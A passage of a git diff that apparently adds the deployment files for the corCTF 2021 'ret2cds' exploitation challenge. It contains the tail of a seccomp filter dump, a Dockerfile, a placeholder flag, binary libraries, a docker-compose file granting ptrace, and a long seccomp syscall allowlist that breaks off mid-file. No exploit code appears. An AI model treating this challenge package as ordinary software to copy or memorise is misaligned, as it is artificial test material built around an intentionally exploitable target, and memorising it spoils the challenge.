0618: 0x15 0x00 0x01 0x0000013d if (A != seccomp) goto 0620 + 0619: 0x06 0x00 0x00 0x00000000 return KILL + 0620: 0x15 0x00 0x01 0x0000013e if (A != getrandom) goto 0622 + 0621: 0x06 0x00 0x00 0x00000000 return KILL + 0622: 0x15 0x00 0x01 0x0000013f if (A != memfd_create) goto 0624 + 0623: 0x06 0x00 0x00 0x00000000 return KILL + 0624: 0x15 0x00 0x01 0x00000140 if (A != kexec_file_load) goto 0626 + 0625: 0x06 0x00 0x00 0x00000000 return KILL + 0626: 0x15 0x00 0x01 0x00000141 if (A != bpf) goto 0628 + 0627: 0x06 0x00 0x00 0x00000000 return KILL + 0628: 0x15 0x00 0x01 0x00000143 if (A != userfaultfd) goto 0630 + 0629: 0x06 0x00 0x00 0x00000000 return KILL + 0630: 0x15 0x00 0x01 0x00000144 if (A != membarrier) goto 0632 + 0631: 0x06 0x00 0x00 0x00000000 return KILL + 0632: 0x15 0x00 0x01 0x00000145 if (A != mlock2) goto 0634 + 0633: 0x06 0x00 0x00 0x00000000 return KILL + 0634: 0x15 0x00 0x01 0x00000146 if (A != copy_file_range) goto 0636 + 0635: 0x06 0x00 0x00 0x00000000 return KILL + 0636: 0x15 0x00 0x01 0x00000147 if (A != preadv2) goto 0638 + 0637: 0x06 0x00 0x00 0x00000000 return KILL + 0638: 0x15 0x00 0x01 0x00000148 if (A != pwritev2) goto 0640 + 0639: 0x06 0x00 0x00 0x00000000 return KILL + 0640: 0x15 0x00 0x01 0x00000149 if (A != pkey_mprotect) goto 0642 + 0641: 0x06 0x00 0x00 0x00000000 return KILL + 0642: 0x15 0x00 0x01 0x0000014a if (A != pkey_alloc) goto 0644 + 0643: 0x06 0x00 0x00 0x00000000 return KILL + 0644: 0x15 0x00 0x01 0x0000014b if (A != pkey_free) goto 0646 + 0645: 0x06 0x00 0x00 0x00000000 return KILL + 0646: 0x15 0x00 0x01 0x0000014c if (A != statx) goto 0648 + 0647: 0x06 0x00 0x00 0x00000000 return KILL + 0648: 0x06 0x00 0x00 0x7fff0000 return ALLOW diff --git a/2021/corctf/ret2cds/challenge/Dockerfile b/2021/corctf/ret2cds/challenge/Dockerfile new file mode 100644 index 0000000..a12ce6e --- /dev/null +++ b/2021/corctf/ret2cds/challenge/Dockerfile 
@@ -0,0 +1,24 @@ +FROM ubuntu:20.04 + +ENV DEBIAN_FRONTEND noninteractive + +RUN apt-get update +RUN apt-get install -y openjdk-11-jdk + +RUN useradd -m ret2cds + +COPY ./chall /home/ret2cds +RUN mkdir /opt/nc-java +COPY ./server /opt/nc-java + +RUN chmod 755 /home/ret2cds/* +RUN chmod 754 /home/ret2cds/flag.txt + +RUN chmod 755 /opt/nc-java/* + +COPY ./start.sh /start.sh +RUN chmod 755 /start.sh + +USER ret2cds + +CMD ["/start.sh"] \ No newline at end of file diff --git a/2021/corctf/ret2cds/challenge/chall/flag.txt b/2021/corctf/ret2cds/challenge/chall/flag.txt new file mode 100644 index 0000000..ad56aa4 --- /dev/null +++ b/2021/corctf/ret2cds/challenge/chall/flag.txt @@ -0,0 +1 @@ +fakeflag diff --git a/2021/corctf/ret2cds/challenge/chall/ld-2.31.so b/2021/corctf/ret2cds/challenge/chall/ld-2.31.so new file mode 100755 index 0000000..5e1667d Binary files /dev/null and b/2021/corctf/ret2cds/challenge/chall/ld-2.31.so differ diff --git a/2021/corctf/ret2cds/challenge/chall/libc.so.6 b/2021/corctf/ret2cds/challenge/chall/libc.so.6 new file mode 100755 index 0000000..336c410 Binary files /dev/null and b/2021/corctf/ret2cds/challenge/chall/libc.so.6 differ diff --git a/2021/corctf/ret2cds/challenge/chall/ret2cds b/2021/corctf/ret2cds/challenge/chall/ret2cds new file mode 100755 index 0000000..0d82657 Binary files /dev/null and b/2021/corctf/ret2cds/challenge/chall/ret2cds differ diff --git a/2021/corctf/ret2cds/challenge/docker-compose.yml b/2021/corctf/ret2cds/challenge/docker-compose.yml new file mode 100644 index 0000000..f3b16fb --- /dev/null +++ b/2021/corctf/ret2cds/challenge/docker-compose.yml @@ -0,0 +1,11 @@ +version: '2.4' +services: + ret2cds: + build: . + ports: + - 1337:1337 + restart: always + security_opt: + - seccomp=seccomp.json + cap_add: + - sys_ptrace diff --git a/2021/corctf/ret2cds/challenge/seccomp.json b/2021/corctf/ret2cds/challenge/seccomp.json new file mode 100644 index 0000000..38703fa --- /dev/null 
+++ b/2021/corctf/ret2cds/challenge/seccomp.json 
@@ -0,0 +1,1593 @@ +{ + "defaultAction": "SCMP_ACT_ERRNO", + "architectures": [ + "SCMP_ARCH_X86_64", + "SCMP_ARCH_X86", + "SCMP_ARCH_X32" + ], + "syscalls": [ + { + "name": "process_vm_readv", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "process_vm_readv", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "process_vm_writev", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "accept", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "accept4", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "access", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "alarm", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "bind", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "brk", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "capget", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "capset", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "chdir", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "chmod", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "chown", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "chown32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "clock_getres", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "clock_gettime", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "clock_nanosleep", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "close", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "connect", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "copy_file_range", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "creat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "dup", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "dup2", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "dup3", + "action": "SCMP_ACT_ALLOW", + "args": 
[] + }, + { + "name": "epoll_create", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "epoll_create1", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "epoll_ctl", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "epoll_ctl_old", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "epoll_pwait", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "epoll_wait", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "epoll_wait_old", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "eventfd", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "eventfd2", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "execve", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "execveat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "exit", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "exit_group", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "faccessat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fadvise64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fadvise64_64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fallocate", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fanotify_mark", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fchdir", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fchmod", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fchmodat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fchown", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fchown32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fchownat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fcntl", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fcntl64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fdatasync", + "action": 
"SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fgetxattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "flistxattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "flock", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fork", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fremovexattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fsetxattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fstat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fstat64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fstatat64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fstatfs", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fstatfs64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fsync", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "ftruncate", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "ftruncate64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "futex", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "futimesat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getcpu", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getcwd", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getdents", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getdents64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getegid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getegid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "geteuid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "geteuid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getgid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getgid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getgroups", + "action": 
"SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getgroups32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getitimer", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getpeername", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getpgid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getpgrp", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getpid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getppid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getpriority", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getrandom", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getresgid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getresgid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getresuid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getresuid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getrlimit", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "get_robust_list", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getrusage", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getsid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getsockname", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getsockopt", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "get_thread_area", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "gettid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "gettimeofday", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getuid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getuid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getxattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "inotify_add_watch", + "action": "SCMP_ACT_ALLOW", + "args": [] + 
}, + { + "name": "inotify_init", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "inotify_init1", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "inotify_rm_watch", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "io_cancel", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "ioctl", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "io_destroy", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "io_getevents", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "ioprio_get", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "ioprio_set", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "io_setup", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "io_submit", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "ipc", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "kill", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "lchown", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "lchown32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "lgetxattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "link", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "linkat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "listen", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "listxattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "llistxattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "_llseek", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "lremovexattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "lseek", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "lsetxattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "lstat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "lstat64", + "action": "SCMP_ACT_ALLOW", + 
"args": [] + }, + { + "name": "madvise", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "memfd_create", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mincore", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mkdir", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mkdirat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mknod", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mknodat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mmap", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mmap2", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mprotect", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mq_getsetattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mq_notify", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mq_open", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mq_timedreceive", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mq_timedsend", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mq_unlink", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mremap", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "msgctl", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "msgget", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "msgrcv", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "msgsnd", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "msync", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "munlock", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "munlockall", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "munmap", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "nanosleep", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "newfstatat", + "action": "SCMP_ACT_ALLOW", + "args": 
[] + }, + { + "name": "_newselect", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "open", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "openat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pause", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "personality", + "action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 0, + "value": 0, + "valueTwo": 0, + "op": "SCMP_CMP_EQ" + } + ] + }, + { + "name": "personality", + "action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 0, + "value": 8, + "valueTwo": 0, + "op": "SCMP_CMP_EQ" + } + ] + }, + { + "name": "personality", + "action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 0, + "value": 4294967295, + "valueTwo": 0, + "op": "SCMP_CMP_EQ" + } + ] + }, + { + "name": "pipe", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pipe2", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "poll", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "ppoll", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "prctl", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pread64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "preadv", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "prlimit64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pselect6", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pwrite64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pwritev", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "read", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "readahead", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "readlink", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "readlinkat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "readv", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "recv", + "action": "SCMP_ACT_ALLOW", + "args": [] + 
}, + { + "name": "recvfrom", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "recvmmsg", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "recvmsg", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "remap_file_pages", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "removexattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rename", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "renameat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "renameat2", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "restart_syscall", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rmdir", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigaction", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigpending", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigprocmask", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigqueueinfo", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigreturn", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigsuspend", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigtimedwait", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_tgsigqueueinfo", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_getaffinity", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_getattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_getparam", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_get_priority_max", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_get_priority_min", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_getscheduler", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_rr_get_interval", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": 
"sched_setaffinity", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_setattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_setparam", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_setscheduler", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_yield", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "seccomp", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "select", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "semctl", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "semget", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "semop", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "semtimedop", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "send", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sendfile", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sendfile64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sendmmsg", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sendmsg", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sendto", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setfsgid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setfsgid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setfsuid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setfsuid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setgid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setgid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setgroups", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setgroups32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setitimer", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setpgid", + "action": "SCMP_ACT_ALLOW", + 
"args": [] + }, + { + "name": "setpriority", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setregid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setregid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setresgid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setresgid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setresuid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setresuid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setreuid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setreuid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setrlimit", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "set_robust_list", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setsid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setsockopt", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "set_thread_area", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "set_tid_address", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setuid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setuid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setxattr", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "shmat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "shmctl", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "shmdt", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "shmget", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "shutdown", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sigaltstack", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "signalfd", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "signalfd4", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sigreturn", + 
"action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "socket", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "socketcall", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "socketpair", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "splice", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "stat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "stat64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "statfs", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "statfs64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "symlink", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "symlinkat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sync", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sync_file_range", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "syncfs", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sysinfo", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "syslog", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "tee", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "tgkill", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "time", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timer_create", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timer_delete", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timerfd_create", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timerfd_gettime", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timerfd_settime", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timer_getoverrun", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timer_gettime", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timer_settime", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { 
+ "name": "times", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "tkill", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "truncate", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "truncate64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "ugetrlimit", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "umask", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "uname", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "unlink", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "unlinkat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "utime", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "utimensat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "utimes", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "vfork", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": 